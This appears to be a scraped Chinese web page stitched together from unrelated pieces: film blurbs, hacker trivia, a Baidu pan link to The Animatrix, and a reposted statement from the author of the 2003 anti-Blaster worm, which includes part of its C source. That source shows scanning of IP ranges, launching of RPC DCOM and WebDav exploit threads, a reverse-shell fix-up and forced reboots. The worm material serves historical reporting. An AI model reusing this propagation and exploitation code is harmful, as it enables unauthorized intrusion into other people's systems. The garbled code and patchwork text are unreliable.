13-year-old Benjamin discovers that his mother didn't die in an accident as he was led to believe. The trail points to high-ranking officials in the Danish Secret Service - "Trust no one!" he is told.

为什么俄罗斯的黑客这么厉害?

没啥特别的,计划经济是连人都要做计划的。有些人在小时候略微显示出天赋,甚至被强行的就指派去搞自然科学。这样从很小就开始专攻一个领域,很容易出成果。我在6年前见过从朝鲜外派过来的几个16-19岁的软件工程师,逻辑思维能力确实很不错,他们就是在很小就开始定向培训了。也就是所谓举国体制。另外,凡是搞过计划经济的国家,工业发展是第一位的,所以搞理科的人地位会被抬高很多。数学作为理科中一项很基础的技能,就会被很看重。于是这些国家的学生往往数学能力都很强。而数学对编程的意义不言而喻。于是乎,中国和俄罗斯的hacker经常包圆各类国际编程比赛的奖项。至于偶尔出现的美国人,我更认为那是无外力下,天赋的自然发挥。天赋这个东西,我相信会比培训更重要。当然,美国人的智力有更多发挥之处,没必要都发挥在hacker这一点上。

《冲击波杀手》那个黑客是谁？

这个问题警察也想知道也没人在网上公布

给您转一篇文章也许对您有用

冲击波杀手的作者网上现身

前言：“冲击波”蠕虫爆发后，大量个人主机及服务器遭受侵袭，各大安全公司，杀毒厂商纷纷推出各种解决方案，不料短短几日内，又出现了来历不明的新蠕虫，经过一些安全专家的反向编译和分析，惊讶的发现，该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁，而且该蠕虫还具有定时自毁功能，显然作者的目标还是有一定的善意因素，但是蠕虫毕竟是蠕虫，因为大量icmp包的发送，还是能够给企业局域网络带来极大的压力，就此，对蠕虫的危害性依然要保持极大的关注和警惕，相关文章可以参见

http://www.donews.com/donews/article/5/50423.html

8月20日，蠕虫作者突然现身，出现在某安全论坛，以下是该作者论坛上声明的转载，并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了～～虫虫四个小时之内已经完成了任务～～～不得不写这豆腐块～～～

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶：小地方小公司小小程序员

偶从不玩安全的，临时抱佛脚，看了些资料，仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ，虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作，发网难财，违背良心，误导民众

偶就帮你丫的除光了虫虫，打光了补丁，没想到他丫的误导的更变态~~~ 你丫的方脑壳

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄，baby 可不是情人吆，偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年？进去就是了，不就是个坐吗，切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了，某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一反向shellcode, 用 eyas的, lion修改

(声明：谁也没给偶，偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下，就一个Call Ebx 通杀了 all 2k xp

他丫的，还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死有 Tftpd.exe, 干吗不用，虽然偶看过 Tftp 协议，练习写过~~~

4 某年某月某日某时某刻，

溜出国门，辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具，对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多，就换个玩法 ~~~

5 发icmp包是为了提高搜索效率，算唯一的危害了~~~ 刺激一下也好~~~

打补丁的虫，杀虫的虫，再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动！

//罢了，冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过？不重启补丁无效，

找 Bill该死说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败，再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码，避免首次执行时，线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行，一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心，

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillMsblast();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下，普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读，增加几个补充说明

1.flashsky www.xfocus.net创始人之一，启明星辰安全专家，擅长古体诗词，7月中公开rpc漏洞利用方式源代码，公开溢出分析报告，造成全球安全领域的震动，冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友，水平不咋地，不过你最好别招惹他，DDOS你一把也够受的。

3.某安全公司安全专家评论，该帖子内容基本属实，蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过，这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说：该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉，并在系统内值入，预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址，并通过RPC漏洞快速传播自己，消耗大量CPU和网络资源，并且有可能会导致系统死机。该病毒的作者似乎无意作恶，病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测，只感染能够PING通的机器，因此瑞星反病毒工程师提醒广大用户，设置防火墙的规则，禁止ping，这样可以有效防止该病毒的入侵。

俄罗斯好看的科幻片

1、《停电》

这部电影的背景设定在未来世界，人类科技已经变得为十分发达，但是与此同时对于科技的依赖也变得越加强烈。没有彗星撞击地球，没有恐怖分子威胁世界，没有核战争摧毁家园，但是因不明原因，全球大停电，世界上各个城市之间的联系突然被破坏了，只有东欧一个环形区域还存在电力，据说在这里出现了外星来客，军队在这个圆环区域之外发现了令人震惊的场景——尸横遍野！到底是什么在摧毁人类，以及人类最后的阵地能够坚守多久？

从预告来看，影片的场面非常宏大，并且有不少人类军队与“外星军团”进行战争的场面，不过外星人的真面目却并未出现，从影片曝光的一款片段中，主角一行人似乎进入到了外星人巢穴之类的地方，在其中发现了许多冷冻仓一样的东西，隔着半透明的玻璃罩似乎能看到其中有着人形的物体，所以或许影片中的外星军团实际上是被外星人改造之后的人类？又或者外星人只是某个恐怖组织的烟幕弹，他们借着黑科技意欲统治全球？不管怎么说，人类都面临着史无前例的巨大危机。

2、《莫斯科陷落2》。

前些年，一部科幻大片的预告在国内火了，一艘奇特的外星人飞船坠落莫斯科，特效令人惊叹，再配合着个性的背景音乐，给许多科幻迷带来了一些新鲜感，这部俄罗斯科幻大片叫《莫斯科陷落》。

然而电影最终出来之后却让人大失所望，电影并不像预告那样以火爆场面为噱头，电影本身其实一个外星人与人类女子相爱的故事。所以，原本的期待化为失落，导致大家对于这部电影的评价非常低，其实这就是俄罗斯电影的一些毛病或者说风格，我们都说俄罗斯人是战斗民族，比较硬核，但是硬核的性格中却拥有一颗温柔的心，无论什么电影，他们都喜欢整出一些文艺腔调的东西，而爱情戏也是其中必不可少的部分，所以其实如果抱着看剧情片的希望去看《莫斯科陷落》，也没那么天雷滚滚。而片子在俄罗斯本土的票房表现似乎不错，因为现如今第二部要出了，影片前不久也曝光了预告。第二部的故事承接第一部，发生在三年后，男女主的感情依然饱受考验，特别是男主必须在自己的外星种族的命运和女主的性命之间做出选择。

世界上十大黑客事件

回顾历史十大黑客事件：不堪一击的系统

--------------------------------------------------------------------------------

http://www.sina.com.cn 2005年11月29日 15:32 天极yesky

DNA杂志籍印度全国软件和服务企业协会(Nasscom) 与孟买警方开展互联网安全周活动之时，回顾了历史上的十大黑客事件——即使是那些被认为固若金汤的系统在黑客攻击面前总显得不堪一击。

20世纪90年代早期

Kevin Mitnick，一位在世界范围内举重若轻的黑客。世界上最强大的科技和电信公司——诺基亚(Nokia)，富士通(Fujitsu)，摩托罗拉(Motorola)，和 Sun Microsystems等的

电脑系统都曾被他光顾过。1995年他被FBI逮捕，于2000年获得假释。他从来不把自己的这种入侵行为称为黑客行为，按照他的解释，应为“社会工程(social engineering)”

2002年11月

伦敦人Gary McKinnon于2002年11月间在英国被指控非法侵入美国军方90多个电脑系统。他现在正接受英国法院就“快速引渡”去美国一事的审理。下一次听证会即将在近日举行。

1995年

来自俄罗斯的黑客Vladimir Levin 在互连网上上演了精彩的“偷天换日”。他是历史上第一个通过入侵银行电脑系统来获利的黑客。1995年，他侵入美国花旗银行并盗走1000万。他于1995年在英国被国际刑警逮捕。之后，他把帐户里的钱转移至美国，芬兰，荷兰，德国，爱尔兰等地。

1990年

为了获得在洛杉矶地区kiis-fm电台第102个呼入者的奖励——保时捷944 s2跑车，Kevin Poulsen控制了整个地区的电话系统，以确保他是第102个呼入者。最终，他如愿以偿获得跑车并为此入狱三年。他现在是Wired News的高级编辑。

1983

当Kevin Poulsen还是一名学生的时候，他就曾成功入侵Arpanet(我们现在使用的Internet的前身)。Kevin Poulsen当时利用了Arpanet的一个漏洞，能够暂时控制美国地区的Arpanet。

1996

美国黑客Timothy Lloyd曾将一个六行的恶意软件放在了其雇主——Omega工程公司(美国航天航空局和美国海军最大的供货商)的网络上。整个逻辑炸弹删除了Omega公司所有负责生产的软件。此事件导致Omega公司损失1000万美金。

1988

年仅23岁的Cornell大学学生Robert Morris在Internet上释放了世界上首个“蠕虫”程序。Robert Morris最初仅仅是把他这个99行的程序放在互联网上进行试验，可结果却使得他的机子被感染并迅速在互联网上蔓延开。美国等地的接入互联网电脑都受到影响。Robert Morris也因此在1990年被判入狱。

1999

Melissa病毒是世界上首个具有全球破坏力的病毒。David Smith在编写此病毒的时候年仅30岁。Melissa病毒使世界上300多间公司的电脑系统崩溃。整个病毒造成的损失接近4亿美金。David Smith随后被判处5年徒刑。

2000

年仅15岁的MafiaBoy(由于年龄太小，因此没有公布其真实身份)在2000年2月6日到2月14日情人节期间成功侵入包括eBay，Amazon 和Yahoo在内的大型网站服务器，他成功阻止了服务器向用户提供服务。他于2000年被捕。

1993

自称为骗局大师(MOD)的组织，将目标锁定美国电话系统。这个组织成功入侵美国国家安全局(NSA)，ATT和美利坚银行。他们建立了一个可以绕过长途电话呼叫系统而侵入专线的系统。

求黑客帝国动画版TheAnimatrix(2003)钟彼得导演的在线免费播放网盘资源链接分享一下

链接: https://pan.baidu.com/s/1uvy29WwFvxTmotPX0w6KJA

提取码: 8stx 导演: 钟彼得 / Andy Jones / 川尻善昭 / 小池健 / 前田真宏 / 森本晃司 / 渡边信一郎编剧: 莉莉·沃卓斯基 / 川尻善昭 / 森本晃司 / 钟彼得 / 拉娜·沃卓斯基主演: 大_明夫 / 克莱顿·华生 / 帕梅拉·阿德龙 / 海蒂·布雷斯 / 特伦斯·卡森 / 美琳达·克拉克 / 奥利薇亚·阿波 / 戴恩·A·戴维斯 / 威廉·R·迪恩类型: 剧情 / 动作 / 科幻 / 动画制片国家/地区: 美国语言: 英语 / 日语上映日期: 2003-06-03(美国)片长: 100分钟又名: 骇客帝国动画版

《黑客帝国动画版》由9段以《黑客帝国》系列电影世界观为基础生发出的短片组成，各篇的角度与风格各异，制作班底汇聚了日本、美国、韩国三地的动画精英。《机器复兴》讲述了MATRIX的历史。机器人不堪人类恶劣对待，终于反抗并将人类化为能源。《少年故事》讲述一名少年突然收到来自网络的召唤，而大批黑衣人开始对他展开围捕。《虚拟程序》展示了一对男女在虚拟训练程序中的片断。《世界纪录》描写一位短跑运动员在接近突破人类极限时终被系统牢牢控制。《超越极限》叙述因为系统错误，平静的街区中出现了一片超常区域。《侦探故事》描写一位侦探被步步引领着试图摆脱系统的桎梏。《矩阵化》讲述一只机器人被人类捕获并驯化的故事。《终极战役》记录了一艘飞船毁灭的经过。